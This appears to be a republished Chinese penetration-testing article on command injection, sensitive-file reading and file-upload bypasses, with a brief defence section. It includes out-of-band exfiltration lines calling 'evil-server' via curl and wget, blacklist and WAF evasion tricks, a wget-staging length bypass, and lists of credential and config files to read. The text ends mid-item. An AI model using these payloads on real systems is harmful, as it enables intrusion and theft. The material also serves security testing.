• ADADADADAD

    网站命令执行渗透测试步骤详情[ 网站建设 ]

    网站建设 时间:2024-12-03 12:29:15

    作者:文/会员上传

    简介:

    哈喽大家好,近期我们Sine安全对客户平台进行渗透测试的时候,发现有一些命令执行的漏洞测试语句和函数,导致服务器被提权被入侵,上一节提到XSS跨站脚本攻击检测方法,本章来总

    以下为本文的正文内容,内容仅供参考!本站为公益性网站,复制本文以及下载DOC文档全部免费。

    哈喽大家好,近期我们Sine安全对客户平台进行渗透测试的时候,发现有一些命令执行的漏洞测试语句和函数,导致服务器被提权被入侵,上一节提到XSS跨站脚本攻击检测方法,本章来总和一下脚本执行命令的详细检测手段,以及绕过waf的办法,只有这样详细的对平台进行安全测试才能保障整个平台安全稳定。

    3.5.1. 简介

    命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。

    该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。

    3.5.2. 常见危险函数

    3.5.2.1. PHP

    system

    exec

    passthru

    shell_exec

    popen

    proc_open

    3.5.2.2. Python

    system

    popen

    subprocess.call

    spawn

    3.5.2.3. Java

    java.lang.Runtime.getRuntime().exec(command)

    3.5.3. 常见注入方式

    分号分割

    || && & 分割

    | 管道符

    \r\n %d0%a0 换行

    反引号解析

    $() 替换

    3.5.4. 无回显技巧

    bash反弹shell

    DNS带外数据

    http带外

    curl http://evil-server/$(whoami)

    wget http://evil-server/$(whoami)

    无带外时利用 sleep 或其他逻辑构造布尔条件

    3.5.5. 常见绕过方式

    3.5.5.1. 空格绕过

    < 符号 cat<123

    \t / %09

    ${IFS} 其中{}用来截断,比如cat$IFS2会被认为IFS2是变量名。另外,在后面加个$可以起到截断的作用,一般用$9,因为$9是当前系统shell进程的第九个参数的持有者,它始终为空字符串

    3.5.5.2. 黑名单绕过

    a=l;b=s;$a$b

    echo "bHM=" | -d

    /?in/?s => /bin/ls

    连接符 cat /etc/pass'w'd

    未定义的初始化变量 cat$x /etc/passwd

    3.5.5.3. 长度限制绕过

    >wget\

    >foo.\

    >com

    ls -t>a

    sh a

    上面的方法为通过命令行重定向写入命令,接着通过ls按时间排序把命令写入文件,最后执行 直接在Linux终端下执行的话,创建文件需要在重定向符号之前添加命令 这里可以使用一些诸如w,[之类的短命令,(使用ls /usr/bin/?查看) 如果不添加命令,需要Ctrl+D才能结束,这样就等于标准输入流的重定向 而在php中 , 使用 shell_exec 等执行系统命令的函数的时候 , 是不存在标准输入流的,所以可以直接创建文件

    3.5.6. 常用符号

    3.5.6.1. 命令分隔符

    %0a / %0d / \n / \r

    ;

    & / &&

    3.5.6.2. 通配符

    * 0到无穷个任意字符

    ? 一个任意字符

    [ ] 一个在括号内的字符,e.g. [abcd]

    [ - ] 在编码顺序内的所有字符

    [^ ] 一个不在括号内的字符

    3.5.7. 防御

    不使用时禁用相应函数

    尽量不要执行外部的应用程序或命令

    做输入的格式检查

    转义命令中的所有shell元字符

    shell元字符包括 #&;`,|*?~<>^()[]{}$\

    3.6. 文件读取

    3.6. 文件读取

    考虑读取可能有敏感信息的文件

    用户目录下的敏感文件

    .bash_history

    .zsh_history

    .profile

    .bashrc

    .gitconfig

    .viminfo

    passwd

    应用的配置文件

    /etc/apache2/apache2.conf

    /etc/nginx/nginx.conf

    应用的日志文件

    /var/log/apache2/access.log

    /var/log/nginx/access.log

    站点目录下的敏感文件

    .svn/entries

    .git/HEAD

    WEB-INF/web.xml

    .htaccess

    特殊的备份文件

    .swp

    .swo

    .bak

    index.php~

    Python的Cache

    __pycache__\__init__.cpython-35.pyc

    3.7. 文件上传

    3.7.1. 文件类型检测绕过

    3.7.1.1. 更改请求绕过

    有的站点仅仅在前端检测了文件类型,这种类型的检测可以直接修改网络请求绕过。同样的,有的站点在后端仅检查了HTTP Header中的信息,比如 Content-Type 等,这种检查同样可以通过修改网络请求绕过。

    3.7.1.2. Magic检测绕过

    有的站点使用文件头来检测文件类型,这种检查可以在Shell前加入对应的字节以绕过检查。几种常见的文件类型的头字节如下表所示

    3.7.1.3. 后缀绕过

    部分服务仅根据后缀、上传时的信息或Magic Header来判断文件类型,此时可以绕过。

    php由于历史原因,部分解释器可能支持符合正则 /ph(p[2-7]?|t(ml)?)/ 的后缀,如 php / php5 / pht / phtml / shtml / pwml / phtm 等 可在禁止上传php文件时测试该类型。

    jsp引擎则可能会解析 jspx / jspf / jspa / jsw / jsv / jtml 等后缀,asp支持 asa / asax / cer / cdx / aspx / ascx / ashx / asmx / asp{80-90} 等后缀。

    除了这些绕过,其他的后缀同样可能带来问题,如 vbs / asis / sh / reg / cgi / exe / dll / com / bat / pl / cfc / cfm / ini 等。

    3.7.1.4. 系统命名绕过

    在Windows系统中,上传 index.php. 会重命名为 . ,可以绕过后缀检查。也可尝试

    index.php%20, index.php:1.jpg"section-814" >

    网站命令执行渗透测试步骤详情.docx

    将本文的Word文档下载到电脑

    推荐度:

    下载